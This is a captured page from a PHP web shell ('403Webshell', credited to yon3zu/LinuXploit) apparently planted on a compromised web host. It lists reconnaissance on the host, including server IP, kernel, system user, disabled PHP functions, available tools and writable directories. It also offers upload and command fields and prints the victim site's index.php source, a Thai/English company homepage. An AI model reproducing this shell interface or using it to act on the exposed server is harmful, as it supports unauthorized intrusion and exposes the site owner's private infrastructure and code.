403Webshell
Server IP : 103.233.193.20  /  Your IP : 216.73.216.169
Web Server : Apache/2
System : Linux host1.itclever.com 4.18.0-553.16.1.el8_10.x86_64 #1 SMP Thu Aug 8 17:47:08 UTC 2024 x86_64
User : oriscomadm ( 1120)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/oriscomadm/domains/oriscom.com/private_html/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/oriscomadm/domains/oriscom.com/private_html/index.php
<?php

require"include/db.php";

require"include/function.php";

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

<meta name="viewport" content="initial-scale=1.0">

<title>Oriscom | <?php echo $Rs['facebook']?></title>

<meta name="keywords" content="<?php echo $Rs['facebook']?>" />

<meta name="description" content="<?php echo $Rs['facebook']?>" />

<link rel="stylesheet" href="css/common.css" type="text/css" charset="utf-8" />

<link rel="stylesheet" href="css/style.css" type="text/css" charset="utf-8" />

<link rel="stylesheet" href="css/iview.css" />

<link rel="stylesheet" href="css/style_slider.css" />

<link rel="stylesheet" href="css/superfish.css" media="screen">

<link rel="stylesheet" href="css/flexslider.css" type="text/css" media="screen" />

<link rel="stylesheet" type="text/css" href="css/jquery.fancybox.css?v=2.1.5" media="screen" />

<link rel="icon" type="image/png" sizes="16x16"  href="/favicons/favicon-16x16.png">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="theme-color" content="#ffffff">

<script src="js/jquery-latest.min.js" type="text/javascript"></script>

<script type="text/javascript" src="js/raphael-min.js"></script>

<script type="text/javascript" src="js/jquery.easing.js"></script>

<script src="js/iview.js"></script>

<script src="js/css3-mediaqueries.js"></script>

<script src="js/hoverIntent.js"></script>

<script src="js/superfish.js"></script>

<script defer src="js/jquery.flexslider.js"></script>



<?php

if(!empty($Rs['banner'])){

	if (!isset($_SESSION['fancybox'])) {

?>

<script type="text/javascript" src="js/jquery.fancybox.js?v=2.1.5"></script>

<script>

	$(document).ready(function () {

        $.fancybox({

            'width': '60%',

            'height': '60%',

            'autoScale': true,

            'transitionIn': 'fade',

            'transitionOut': 'fade',

            'type': 'iframe',

            'href': 'popup.php'

        });

});

</script>

<?php

    $_SESSION['fancybox'] = true;

}}

?>

<script>

$(document).ready(function(){

	$('#iview2').iView({

		pauseTime: 7000,

		pauseOnHover: true,

		directionNavHoverOpacity: 0,

		timerDiameter: "50%",

		timerPadding: 0,

		timerStroke: 7,

		timerBarStroke: 0,

		timerColor: "#FFF",

		controlNav: true,

		controlNavThumbs: false,

		controlNavTooltip: false,

		controlNavHoverOpacity: 1.0,

		timerPosition: "bottom-right"

	});

	// initialise plugin

	var example = $('#example').superfish({

		//add options here if required

	});



	// buttons to demonstrate Superfish's public methods

	$('.destroy').on('click', function(){

		example.superfish('destroy');

	});



	$('.init').on('click', function(){

		example.superfish();

	});



	$('.open').on('click', function(){

		example.children('li:first').superfish('show');

	});



	$('.close').on('click', function(){

		example.children('li:first').superfish('hide');

	});

	$('.flexslider').flexslider({

		animation: "slide",

		start: function(slider){

			$('body').removeClass('loading');

		}

	});

});

</script>

<script>

$(function(){

	$( "#menu" ).toggle(function() {

		 $('ul.menulist').slideDown(500);

	}, function() {

		$('ul.menulist').slideUp(500);

	});

	

	$('#nav > li > a').click(function(){

		if ($(this).attr('class') != 'active'){

		  $('#nav li ul').slideUp();

		  $(this).next().slideToggle();

		  $('#nav li a').removeClass('active');

		  $(this).addClass('active');

		}

	});

	$('ul.second > li > a').click(function(){

		if ($(this).attr('class') != 'active'){

		  $('ul.second li ul').slideUp();

		  $(this).next().slideToggle();

		  $('ul.second li a').removeClass('active');

		  $(this).addClass('active');

		}

	});

	$('ul.third > li > a').click(function(){

		if ($(this).attr('class') != 'active'){

		  $('ul.third li ul').slideUp();

		  $(this).next().slideToggle();

		  $('ul.third li a').removeClass('active');

		  $(this).addClass('active');

		}

	});

	$('ul.fourth > li > a').click(function(){

		if ($(this).attr('class') != 'active'){

		  $('ul.fourth li ul').slideUp();

		  $(this).next().slideToggle();

		  $('ul.fourth li a').removeClass('active');

		  $(this).addClass('active');

		}

	});

	$('ul.fifth > li > a').click(function(){

		if ($(this).attr('class') != 'active'){

		  $('ul.fifth li ul').slideUp();

		  $(this).next().slideToggle();

		  $('ul.fifth li a').removeClass('active');

		  $(this).addClass('active');

		}

	});

	

});

</script>

</head>



<body>



<?php require("include/header.php"); ?>

<?php require("include/slider.php"); ?>

<div class="welcome"><label class="thh"><?php echo $Rs['wellcome']?></label><label class="enn" style="display:none;"><?php echo $Rs['wellcome_en']?></label></div>



<div class="product_service">

	<ul class="list_produuct_service">

	<?php 

    foreach($ResultProduct_I as $Level1){

	$L1k = $Level1['nameth'].','.$Level1['nameen'];

	$link1 = 'category.php?i=2&l=1&id='.$Level1['id'].'&name='.$L1k;

    ?>

    	<li>

        	<ul>

            	<li>

                    <div class="flexslider">

                              <ul class="slides">

                              <?php 

							  for($i=0;$i<4;$i++){

								  if($Level1["image$i"]!=""){

								  ?>

                                	<li>

                                    	<a href="<?php echo $link1?>"><img src="data/<?php echo $Level1["image$i"]?>" /></a>

                                    </li>

                                    <?php }}?>

                              </ul>

                    </div>

                </li>

                <li><a href="javascript:void(0)"><h2 class="h2_pro"><label class="thh"><?php echo $Level1['nameth']?></label><label class="enn" style="display:none;"><?php echo $Level1['nameen']?></label></h2></a></li>

				<?php 

                $ResultProduct_II = $Class->selectProduct_II($Level1['id'],null);

				$i=0;

                foreach($ResultProduct_II as $Level2){

				$i++;

				if($i<=5){

				$L2k = $Level2['nameth'].','.$Level2['nameen'];

				$link2="category.php?i=2&l=2&id=$Level2[id]&name=$L2k";

				?>

                    <li><a href="<?php echo $link2?>"><label class="thh"><?php echo $Level2['nameth']?></label><label class="enn" style="display:none;"><?php echo $Level2['nameen']?></label></a></li>

                    <?php }}?>  

                    <li><a href="<?php echo $link1?>"><span class="more">more</span></a></li>

            </ul>

        </li>

    <?php }?>  

    </ul>

</div>



<?php require("include/footer.php");?>

</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit